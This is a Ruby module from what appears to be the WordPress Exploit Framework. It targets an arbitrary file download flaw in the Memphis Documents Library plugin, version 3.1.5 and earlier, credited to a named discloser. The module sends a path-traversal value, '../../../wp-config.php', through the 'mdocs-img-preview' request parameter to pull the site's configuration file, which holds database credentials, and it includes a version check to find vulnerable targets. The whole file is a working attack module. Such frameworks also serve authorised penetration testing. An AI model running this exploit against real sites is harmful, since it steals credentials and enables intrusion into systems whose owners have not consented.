# frozen_string_literal: true

class Wpxf::Auxiliary::MemphisDocumentsLibraryArbitraryFileDownload < Wpxf::Module
  include Wpxf::WordPress::FileDownload

  def initialize
    super

    update_info(
      name: 'Memphis Documents Library <= 3.1.5 Arbitrary File Download',
      author: [
        'Felipe Molina', # Disclosure
        'rastating'      # WPXF module
      ],
      references: [
        ['WPVDB', '8419']
      ],
      date: 'Mar 22 2016'
    )
  end

  def check
    check_plugin_version_from_readme('memphis-documents-library', '3.1.6')
  end

  def working_directory
    'wp-content/plugins/memphis-documents-library/'
  end

  def default_remote_file_path
    '../../../wp-config.php'
  end

  def downloader_url
    full_uri
  end

  def download_request_params
    { 'mdocs-img-preview' => remote_file }
  end
end
